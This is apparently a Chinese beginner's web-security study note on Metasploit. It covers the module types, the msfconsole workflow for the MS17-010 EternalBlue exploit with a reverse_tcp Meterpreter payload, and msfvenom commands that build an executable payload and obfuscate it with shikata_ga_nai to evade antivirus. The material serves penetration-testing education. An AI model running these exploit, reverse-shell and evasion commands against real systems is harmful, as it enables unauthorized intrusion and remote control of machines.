Metasploit工具使用详解(上)丨小白WEB安全入门笔记

Metasploit工具使用详解(上)丨小白WEB安全入门笔记

一、课程定位与工具概述

  1. 课程性质

    • 小白WEB安全入门课程
    • 聚焦基础操作,非深度专题(Metasploit专题可讲数十节课)
    • 目标:掌握基本概念和简单漏洞利用
  2. Metasploit核心定义

    • 渗透测试框架(Penetration Testing Framework)
    • 用Ruby编写的代码库
    • 核心功能:漏洞扫描、漏洞验证、攻击载荷生成、反病毒绕过
  3. 版本区别

    版本类型 特点
    开源免费版 命令行操作(MSFconsole),模块代码公开,易被反病毒软件识别
    商业Pro版 图形化界面(GUI),自动化渗透,闭源代码具备免杀能力(AntiVirus Bypass)
  4. 运行环境要求

    • 跨平台支持(Kali Linux/Windows/macOS/Ubuntu等)
    • 强制依赖 :Ruby语言环境(通过gem安装必要库)
    • 预装环境推荐:PentestBox/Kali Linux

二、Metasploit核心组件解析

1. 模块分类与功能

模块类型 作用 实例
Exploit 漏洞利用模块(导弹载体) windows/smb/ms17_010_eternalblue
Payload 攻击载荷(导弹弹头),决定攻击后行为 windows/meterpreter/reverse_tcp
Auxiliary 辅助模块(端口扫描/服务发现) scanner/portscan/tcp
Encoder 载荷编码器(免杀混淆) x86/shikata_ga_nai
Post 后渗透模块

2. Meterpreter核心功能

  • 作用:高级内存驻留型后渗透控制端
  • 核心能力
    • 多会话管理(同时控制多个肉鸡)
    • 文件系统操作(上传/下载/执行)
    • 屏幕截图/键盘记录
    • 权限提升(getsystem)

三、基础操作流程

1. MSFconsole启动与信息查看

bash 复制代码
msfconsole         # 启动控制台
banner             # 查看动态标识
version            # 检查版本信息

2. 模块搜索与调用

bash 复制代码
search type:exploit name:ms17-010  # 按漏洞编号搜索
use exploit/windows/smb/ms17_010_eternalblue  # 加载模块
info                               # 查看模块详情

3. 参数配置关键项

bash 复制代码
show options        # 查看必填参数
set RHOSTS 192.168.1.100  # 设置目标IP
set PAYLOAD windows/meterpreter/reverse_tcp  # 配置载荷
set LHOST 10.0.0.5  # 设置监听IP(攻击机)
set LPORT 4444      # 设置监听端口

4. 攻击执行与会话管理

bash 复制代码
exploit            # 执行攻击(或run)
sessions -l        # 查看活跃会话
sessions -i 1      # 进入会话1

四、技术要点详解

1. Payload生成机制

  • 生成命令msfvenom(独立工具)

  • 支持格式

    bash 复制代码
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o payload.exe
  • 输出格式选项
    exe(可执行文件)| asp(网页脚本)| war(Java应用)| psh(PowerShell)

2. 免杀混淆技术

  • 核心命令msfvenom-e参数

    bash 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -f exe
  • 参数说明
    -e 指定编码器 | -i 迭代次数(增强混淆)

3. 工作流关键比喻

组件 军事比喻 技术作用
Exploit 导弹发射系统 突破目标防御
Payload 弹头战斗部 植入后门/执行恶意代码
Meterpreter 指挥控制中心 远程控制被攻陷主机

五、学习路径建议

  1. 优先掌握

    • 漏洞搜索(search)与模块调用(use
    • 基础参数配置(RHOSTS/LHOST/PAYLOAD
    • 会话管理(sessions
  2. 实验重点

    • 使用ms17-010漏洞攻击Windows靶机
    • 生成免杀Payload并测试绕过基础杀软
  3. 进阶方向

    • 研究Ruby编写的模块源码(开源版)
    • 学习Post模块进行后渗透操作

下节课预告:Metasploit实战漏洞攻击演示(含MS17-010操作案例)


总结

本课系统解析了Metasploit框架的核心架构与基础操作,重点强调:

  1. 框架定位:Ruby编写的渗透测试工具,分开源免费版(命令行)和商业Pro版(GUI/免杀)
  2. 模块化设计:Exploit(漏洞利用)、Payload(攻击载荷)、Auxiliary(辅助扫描)分工明确
  3. 工作流核心:搜索模块→配置参数(RHOSTS/LHOST/PAYLOAD)→执行攻击→会话管理
  4. 新手优先级 :掌握msfconsole基础命令流,理解Exploit-Payload-Meterpreter协作机制
  5. 安全警示:开源版Payload易被检测,需配合编码器(Encoder)实现基础免杀
相关推荐
lubiii_26 分钟前
攻防世界János-the-Ripper
安全·网络安全
全是操作39 分钟前
安卓学习笔记-数据存储
android·笔记·学习
枷锁—sha1 小时前
【HW系列】—C2远控服务器(webshell链接工具, metasploit、cobaltstrike)的漏洞特征流量特征
运维·服务器·网络·测试工具·web安全·网络安全
珊瑚里的鱼1 小时前
第十讲 | 继承
开发语言·c++·笔记·visualstudio·学习方法·visual studio
Timmer丿1 小时前
kafka学习笔记(三、消费者Consumer使用教程——从指定位置消费)
java·笔记·学习·kafka
LeeAmos12 小时前
CTA-861-G-2017中文pdf版
笔记
s_little_monster2 小时前
【Linux】网络--传输层--深入理解TCP协议
linux·运维·经验分享·笔记·网络协议·学习·tcp/ip
小葡萄20253 小时前
黑马程序员C++核心编程笔记--4 类和对象--封装
java·c++·笔记
liangjiao_shou3 小时前
安全生产例题
安全
恒拓高科WorkPlus4 小时前
安全,稳定可靠的政企即时通讯数字化平台
人工智能·安全